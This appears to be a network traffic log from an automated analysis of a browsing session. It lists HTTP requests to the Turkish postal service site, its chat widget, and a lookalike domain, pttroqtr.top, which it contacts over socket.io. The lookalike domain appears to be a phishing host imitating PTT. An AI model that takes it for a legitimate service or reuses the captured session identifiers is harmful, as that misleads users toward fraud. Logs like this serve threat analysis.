Source: global trafficHTTP traffic detected: GET /_next/static/chunks/pages/index-81bebd65698c8415.js HTTP/1.1Host: www.ptt.gov.trConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Purpose: prefetchSec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://www.ptt.gov.tr/Sayfalar/Posta/DigerPostaIslemleriUst.aspxAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: undefined=1; _ga_SFQ172Y7CH=GS1.1.1727494784.1.0.1727494784.0.0.0; _ga=GA1.1.1443587032.1727494784
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/4110-03c15b7eaf980721.js HTTP/1.1Host: www.ptt.gov.trConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: undefined=1; _ga_SFQ172Y7CH=GS1.1.1727494784.1.0.1727494784.0.0.0; _ga=GA1.1.1443587032.1727494784
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/5698-10f078fe5b68f680.js HTTP/1.1Host: www.ptt.gov.trConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Purpose: prefetchSec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://www.ptt.gov.tr/Sayfalar/Posta/DigerPostaIslemleriUst.aspxAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: undefined=1; _ga_SFQ172Y7CH=GS1.1.1727494784.1.0.1727494784.0.0.0; _ga=GA1.1.1443587032.1727494784
Source: global trafficHTTP traffic detected: GET /static/assets/js/reconnecting-websocket.min.js HTTP/1.1Host: chatserver.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://chatserver.alo-tech.com/content/spa.html?hostname=pttem.alo-tech.com&lang=tr&queue=[{%22name%22:%22Whatsapp%20Chat%22,%22key%22:%22ahRzfm11c3RlcmktaGl6bWV0bGVyaXISCxIFUXVldWUYgIC47ozj_ggMogEScHR0ZW0uYWxvLXRlY2guY29t%22}]&client_name=&client_email=&phone_number=&cwid=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t&page_origin=https%3A%2F%2Fwww.ptt.gov.trAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static/assets/js/ua-parser.min.js HTTP/1.1Host: chatserver.alo-tech.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static/assets/img/microphone_open.svg HTTP/1.1Host: chatserver.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://chatserver.alo-tech.com/content/spa.html?hostname=pttem.alo-tech.com&lang=tr&queue=[{%22name%22:%22Whatsapp%20Chat%22,%22key%22:%22ahRzfm11c3RlcmktaGl6bWV0bGVyaXISCxIFUXVldWUYgIC47ozj_ggMogEScHR0ZW0uYWxvLXRlY2guY29t%22}]&client_name=&client_email=&phone_number=&cwid=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t&page_origin=https%3A%2F%2Fwww.ptt.gov.trAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static/assets/bootstrap/js/bootstrap.min.js HTTP/1.1Host: chatserver.alo-tech.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static/assets/img/down_button.svg HTTP/1.1Host: chatserver.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://chatserver.alo-tech.com/content/spa.html?hostname=pttem.alo-tech.com&lang=tr&queue=[{%22name%22:%22Whatsapp%20Chat%22,%22key%22:%22ahRzfm11c3RlcmktaGl6bWV0bGVyaXISCxIFUXVldWUYgIC47ozj_ggMogEScHR0ZW0uYWxvLXRlY2guY29t%22}]&client_name=&client_email=&phone_number=&cwid=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t&page_origin=https%3A%2F%2Fwww.ptt.gov.trAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static/assets/img/microphone_close.svg HTTP/1.1Host: chatserver.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://chatserver.alo-tech.com/content/spa.html?hostname=pttem.alo-tech.com&lang=tr&queue=[{%22name%22:%22Whatsapp%20Chat%22,%22key%22:%22ahRzfm11c3RlcmktaGl6bWV0bGVyaXISCxIFUXVldWUYgIC47ozj_ggMogEScHR0ZW0uYWxvLXRlY2guY29t%22}]&client_name=&client_email=&phone_number=&cwid=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t&page_origin=https%3A%2F%2Fwww.ptt.gov.trAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static/assets/js/langcodes.min.js HTTP/1.1Host: chatserver.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://chatserver.alo-tech.com/content/spa.html?hostname=pttem.alo-tech.com&lang=tr&queue=[{%22name%22:%22Whatsapp%20Chat%22,%22key%22:%22ahRzfm11c3RlcmktaGl6bWV0bGVyaXISCxIFUXVldWUYgIC47ozj_ggMogEScHR0ZW0uYWxvLXRlY2guY29t%22}]&client_name=&client_email=&phone_number=&cwid=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t&page_origin=https%3A%2F%2Fwww.ptt.gov.trAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static/assets/js/owl.carousel.min.js HTTP/1.1Host: chatserver.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://chatserver.alo-tech.com/content/spa.html?hostname=pttem.alo-tech.com&lang=tr&queue=[{%22name%22:%22Whatsapp%20Chat%22,%22key%22:%22ahRzfm11c3RlcmktaGl6bWV0bGVyaXISCxIFUXVldWUYgIC47ozj_ggMogEScHR0ZW0uYWxvLXRlY2guY29t%22}]&client_name=&client_email=&phone_number=&cwid=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t&page_origin=https%3A%2F%2Fwww.ptt.gov.trAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static/assets/js/jquery-2.0.3.min.js HTTP/1.1Host: chatserver.alo-tech.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static/chat_files/jss/chat_v3.min.js?v=13 HTTP/1.1Host: service-edge.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=websocket&sid=DijwWc-tALPoXXo3AEf9 HTTP/1.1Host: pttroqtr.topConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://pttroqtr.topSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: fN9e12B/En3fXINCH7sx3w==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8sjep5&sid=DijwWc-tALPoXXo3AEf9 HTTP/1.1Host: pttroqtr.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pttroqtr.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8sjeaI HTTP/1.1Host: pttroqtr.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static/assets/js/reconnecting-websocket.min.js HTTP/1.1Host: chatserver.alo-tech.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/pages/%5Bslug%5D-88e5a3b326ec670d.js HTTP/1.1Host: www.ptt.gov.trConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: undefined=1; _ga_SFQ172Y7CH=GS1.1.1727494784.1.0.1727494784.0.0.0; _ga=GA1.1.1443587032.1727494784
Source: global trafficHTTP traffic detected: GET /static/assets/img/microphone_open.svg HTTP/1.1Host: chatserver.alo-tech.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static/assets/img/microphone_close.svg HTTP/1.1Host: chatserver.alo-tech.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/css/2425cba10de1645b.css HTTP/1.1Host: www.ptt.gov.trConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.ptt.gov.tr/Sayfalar/Posta/DigerPostaIslemleriUst.aspxAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: undefined=1; _ga_SFQ172Y7CH=GS1.1.1727494784.1.0.1727494784.0.0.0; _ga=GA1.1.1443587032.1727494784
Source: global trafficHTTP traffic detected: GET /static/assets/img/down_button.svg HTTP/1.1Host: chatserver.alo-tech.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/pages/index-81bebd65698c8415.js HTTP/1.1Host: www.ptt.gov.trConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: undefined=1; _ga_SFQ172Y7CH=GS1.1.1727494784.1.0.1727494784.0.0.0; _ga=GA1.1.1443587032.1727494784
Source: global trafficHTTP traffic detected: GET /static/assets/js/langcodes.min.js HTTP/1.1Host: chatserver.alo-tech.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/pages/doviz-kurlari-5a26b114db728c07.js HTTP/1.1Host: www.ptt.gov.trConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Purpose: prefetchSec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://www.ptt.gov.tr/Sayfalar/Posta/DigerPostaIslemleriUst.aspxAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: undefined=1; _ga_SFQ172Y7CH=GS1.1.1727494784.1.0.1727494784.0.0.0; _ga=GA1.1.1443587032.1727494784
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/4412-8214ad20a138381f.js HTTP/1.1Host: www.ptt.gov.trConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: undefined=1; _ga_SFQ172Y7CH=GS1.1.1727494784.1.0.1727494784.0.0.0; _ga=GA1.1.1443587032.1727494784
Source: global trafficHTTP traffic detected: GET /static/assets/js/linkify.min.js HTTP/1.1Host: chatserver.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://chatserver.alo-tech.com/content/spa.html?hostname=pttem.alo-tech.com&lang=tr&queue=[{%22name%22:%22Whatsapp%20Chat%22,%22key%22:%22ahRzfm11c3RlcmktaGl6bWV0bGVyaXISCxIFUXVldWUYgIC47ozj_ggMogEScHR0ZW0uYWxvLXRlY2guY29t%22}]&client_name=&client_email=&phone_number=&cwid=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t&page_origin=https%3A%2F%2Fwww.ptt.gov.trAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static/assets/js/owl.carousel.min.js HTTP/1.1Host: chatserver.alo-tech.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /chat/get_my_widget_settings?widget_key=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t&escapeHtml=false HTTP/1.1Host: pttem.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/json, text/javascript, */*; q=0.01sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://chatserver.alo-tech.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static/chat_files/jss/chat_v3.min.js?v=13 HTTP/1.1Host: service-edge.alo-tech.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/css/2425cba10de1645b.css HTTP/1.1Host: www.ptt.gov.trConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: undefined=1; _ga_SFQ172Y7CH=GS1.1.1727494784.1.0.1727494784.0.0.0; _ga=GA1.1.1443587032.1727494784
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8sjf1e&sid=DijwWc-tALPoXXo3AEf9 HTTP/1.1Host: pttroqtr.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pttroqtr.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8sjep2&sid=DijwWc-tALPoXXo3AEf9 HTTP/1.1Host: pttroqtr.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8sjep5&sid=DijwWc-tALPoXXo3AEf9 HTTP/1.1Host: pttroqtr.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /storage/media?gcs_file_name=chat/chat_icons/3af51a49-058b-4e67-9af9-1575813efeeb.png&chat_icon=true HTTP/1.1Host: pttem.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /chat/get_my_widget_settings?widget_key=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t&escapeHtml=false HTTP/1.1Host: pttem.alo-tech.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static/assets/js/linkify.min.js HTTP/1.1Host: chatserver.alo-tech.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static/assets/js/linkify.html.min.js HTTP/1.1Host: chatserver.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://chatserver.alo-tech.com/content/spa.html?hostname=pttem.alo-tech.com&lang=tr&queue=[{%22name%22:%22Whatsapp%20Chat%22,%22key%22:%22ahRzfm11c3RlcmktaGl6bWV0bGVyaXISCxIFUXVldWUYgIC47ozj_ggMogEScHR0ZW0uYWxvLXRlY2guY29t%22}]&client_name=&client_email=&phone_number=&cwid=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t&page_origin=https%3A%2F%2Fwww.ptt.gov.trAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/css/386d6f9094f2dfbc.css HTTP/1.1Host: www.ptt.gov.trConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.ptt.gov.tr/Sayfalar/Posta/DigerPostaIslemleriUst.aspxAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: undefined=1; _ga_SFQ172Y7CH=GS1.1.1727494784.1.0.1727494784.0.0.0; _ga=GA1.1.1443587032.1727494784
